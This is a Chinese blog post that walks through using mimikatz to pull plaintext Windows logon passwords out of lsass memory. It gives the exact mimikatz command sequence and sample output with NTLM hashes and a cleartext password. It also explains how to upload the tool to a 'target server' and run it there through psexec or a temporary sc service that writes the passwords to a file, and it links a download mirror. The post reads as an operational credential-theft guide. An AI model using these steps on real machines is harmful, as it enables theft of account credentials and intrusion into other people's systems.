获取Windows系统明文密码神器

最新推荐文章于 2022-01-03 22:50:04 发布
最新推荐文章于 2022-01-03 22:50:04 发布
阅读量2.2k 收藏 1
点赞数
分类专栏: hacking 文章标签: windows server dll 终端 delete 测试

今日在群看到某牛发一链接,老外所书某文,介绍使用此器获取系统明文密码的一些方法,具体如下:

注:使用前需确定自身系统是x86还是x64

本人测试环境:windows 2003

密码长度:8位

进入文件所在目录,双击打开mimikatz.exe,按照以下步骤进行,

1、mimikatz # privilege::debug

2、mimikatz # inject::process lsass.exe sekurlsa.dll

3、mimikatz # @getLogonPasswords

Authentification Id : 0;434898
Package d’authentification : NTLM
Utilisateur principal : User
Domaine d’authentification : vm-w7-ult
msv1_0 : lm{ e52cac67419a9a224a3b108f3fa6cb6d }, ntlm{ 8846f7eaee8fb117ad06bdd830b7586c }
wdigest : fuck1234
tspkg : fuck1234 这里就是密码
我测试的时候还能看到历史密码。比较牛x的神器!

经网络众人分析,支持系统如下:

Windows XP (部分可以)
Windows Server 2003
Windows Server 2008
Windows Vista
Windows 7
Windows 7 SP1

XP有些系统版本会出现拒绝访问。

在远程终端中运行该程序部分会提示:”存储空间不足,无法处理此命令”。

这是因为在终端模式下,不能插入远线程,跨会话不能注入,你需要使用如下方法执行该程序:

首先提取几个文件:

mimikatz_trunk\tools\PsExec.exe
mimikatz_trunk\Win32\mimikatz.exe
mimikatz_trunk\Win32\sekurlsa.dll

打包后上传至目标服务器,然后解压释放,注意路径中绝对不能有中文(可以有空格)!否则加载DLL的时候会报错:找不到文件。

//最简单实用的方法,使用 PsExec.exe 启动。
//在本机启动交互式命令提示窗口
psexec

psexec -s  c:\mimikatz\mimikatz.exe

//启动 mimikatz.exe
C:\mimikatz_trunk\Win32\mimikatz.exe
//提升权限
privilege::debug
//注入dll,要用绝对路径!并且路径中绝对不能有中文(可以有空格)!
inject::process lsass.exe "C:\mimikatz_trunk\Win32\sekurlsa.dll"
//抓取密码
@getLogonPasswords
//退出,不要用 ctrl + c,会导致 mimikatz.exe CPU 占用达到 100%,死循环。
exit
//创建服务方法
sc create getpassword binpath= "cmd.exe /c c:\xxx\mimikatz.exe < command.txt > password.txt"
sc start getpassword
sc delete getpassword

 

原下载地址:http://blog.gentilkiwi.com/mimikatz

原文地址:http://pentestmonkey.net/blog/mimikatz-tool-to-recover-cleartext-passwords-from-lsass

参考地址:http://lcx.cc/?FoxNews=2265.html

本地下载地址:http://jafee.net/Soft/Hack/mimikatz.rar

 

「已注销」
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mimikatz获取系统管理员账号明文密码工具
02-15
mimikatz 是一个来自法国的神器,能直接读取系统管理员密码明文,通杀xp win2003 win7 win2008,这个工具功能很强大,如果您能熟练运用它,就能体会到。
【转】获取Windows系统明文密码神器
weixin_34041003的博客
08-15 522
前序 电脑密码忘记了可以用本工具找回,前提是你能进入系统,例如本机保存了远程服务器登录的密码或借别人的电脑,而忘记了密码;mimikatz 2.0工具正好解决了你的问题。 工具下载 binaires : https://github.com/gentilkiwi/mimikatz/releases/latest baiduyun : http://pan.baidu.com/s/1i38m7...
几款优秀的Windows密码抓取工具
LuckySec
03-24 6754
前言 本篇介绍几款优秀的Windows上的密码抓取工具,每个工具都有自己的特点非常实用,欢迎补充。 0x01 Mimikatz 个人点评:这款工具非常强大,公认的Windows密码神器。 1. 简介 Mimikat是一个法国人写的轻量级调试器。Mimikat可以从内存中提取纯文本密码,hash,PIN码和kerberos票证。mimikatz还可以执行哈希传递,票证传递或构建Golden票证 项目地址:https://github.com/gentilkiwi/mimikatz/ 2. 使用 cmd运行
mimikatz(windows 明文密码抓取工具)
04-02
windows 明文密码抓取工具,分别有32位和64位版本,在XP和win 7 旗舰版上测试成功
windows下抓取明文密码神器之mimikatz
weixin_34166472的博客
08-15 820
下载地址:https://github.com/gentilkiwi/mimikatz/releases 功能:抓取windows下内存中的明文密码简单介绍:windows下抓取密码神器之mimikatz,使用该工具可以抓取内存中的明文密码,包括登录其他域的密码,访问某些×××的密码等!该工具主要在内网中进行使用,先通过添加管理账号登录到系统中,然后使用该工具抓取原系统中的管...
一键获取windows密码神器mimikatz咪咪猫
07-23
**标题解析:**“一键获取windows密码神器mimikatz咪咪猫”指的是Mimikatz,这是一个在网络安全领域中著名的开源工具,主要用于提取Windows操作系统的登录密码和其他敏感信息。 **描述详解:**描述中的“mimikatz....
windows 密码抓捕神器mimikatz
08-15
它能够帮助安全专家和管理员从系统内存中提取出敏感信息,包括但不限于Windows系统的用户名、明文密码、NTLM哈希值、 Kerberos票证等。 Mimikatz的核心功能主要分为以下几个部分: 1. **LSA(Local Security ...
Mimikatz Windows 密码抓取神器
05-27
这款工具因其强大的密码抓取能力而闻名,可以提取出系统内存中的明文密码、哈希值以及其他敏感凭证,从而帮助安全研究人员检测系统的漏洞和防护措施。 在Windows环境中,Mimikatz 能够执行以下关键功能: 1. **LSA...
获取明文密码神器mimikatz最新版
06-13
mimikatz是法国人Gentil Kiwi编写的一款windows平台下的神器,它具备很多功能,其中最亮的功能是直接从 lsass.exe 进程里获取windows处于active状态账号的明文密码。mimikatz的功能不仅如此,它还可以提升进程权限...
获取Windows账号口令神器-mimikatz
09-19
获取windows XP、2003、Win7、Vista、2008等操作系统已登录用户的账号明文口令,命令: mimikatz privilege::debug inject::process lsass.exe sekurlsa.dll @getLogonPasswords exit
windows明文密码读取
09-28
windows明文密码读取,需要administrator权限
x64位提权读密码工具
08-31
x64位提权读密码工具
GetPass_cmd_获得windowsXP内存密码
03-22
从window xp 系统内存中获取当前用户名密码 有什么用途,你懂的 只是现在用xp的少了一点,但是还没有绝迹
GetPass_cmd 获取系统密码
03-26
获取内存中的密码,运行后,可显示出当前所有登录用户的密码,我知道这是你想要的!
利用系统函数获取Windows明文密码
Adminxe的博客
07-22 676
0x01 前言 前段时间,根据大佬Grzegorz Tworek发布的 :使用LanMan版本的NPLogonNotify()函数来嗅探用于登录Windows的每个密码明文。无需重新启动。今天过来研究一波,同时借鉴 来自鸿鹄 ly大佬写的集成powershell调用,来进一步方便利用。 0x02 原理 通过修改注册表,借助系统函数,抓取Windows明文密码 0x03 复现 然后将下列代码编译为dll文件: NPPSPy.c源代码 #include <Windows.h...
第20节 简单密码破解—基于windows系统
m0_64378913的博客
01-03 4655
本节主要介绍了本地密码破解和远程暴力破解。其中,本地密码破解主要介绍了利用5次shift漏洞、利用PE破解系统密码、利用getpass提取系统密码和利用PwDump和SAMInside组合爆破。而远程暴力破解主要介绍了 NTscan针对445端口进行爆破以及九头蛇hydra windows版本。最后需要重点掌握SAM文件格式由 “用户名+RID+LM-hash+NT-hash” 四列数据组成。
【渗透测试笔记】之【内网渗透——横向移动:获取Windows明文密码与散列值的若干方法和防御手段】
AA8j的博客
11-14 3032
文章目录1. Hash结构2. 获取方法2.1 mimikatz2.1.1 在线读取散列值和明文密码2.1.2 在线读取SAM文件,获取散列值2.1.3 离线读取lsass.dmp 文件,获取明文与散列值1. 导出lsass.dmp 文件2. 读取lsass.dmp 文件2.1.4 离线读取SAM和system文件,获取散列值1. 导出2. 读取2.1.5 使用PowerShell版mimikatz获取明文密码与散列值2.2 GetPassword(获得明文密码及散列值)2.3 PwDump7(获得散列值)
工具试用:获取哈希
prettyX的博客
12-23 894
0X01 GetPass.exe 1、GetPass.exe 32位下使用 需要管理员权限 小H伞直接报 2、GetPassword_x64.exe 64位下使用 需要管理员权限 小H伞未报 0X02 pwdump7.exe 结果为用户名,哈希。星号代表空。 0X03 Quarks-pwdump.exe 哈希前半部分以“AAD3...”开头的代表空。 0X04...
使用get password破解windows密码
北城的博客
11-07 2220
getpassword获取地址: 链接:https://pan.baidu.com/s/1denqGp9azbH8FyHsK3l_XA 提取码:i03z 下载压缩包后解压,根据自己的系统位数选择合适的.exe文件。 在这里我想破解的是的是win7 64为系统密码 (注:本来是想直接在本机win10中使用getpassword,来破解本机密码的。不过我发现好像这个软件对win10系统没用,所以我就在VMware中下了一个win7系统,尝试使用该软件,成功破解win7密码) 右键以管理员身.
Windows API编程:获取密码文本方法详解
"获取编辑框里的密码文本的代码详解——Windows API 编程" 在Windows API编程中,常常需要处理各种控件,如编辑框(Edit Control)。编辑框用于输入文本,有时是明文,有时是密码模式,比如显示星号或圆点。当处理...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值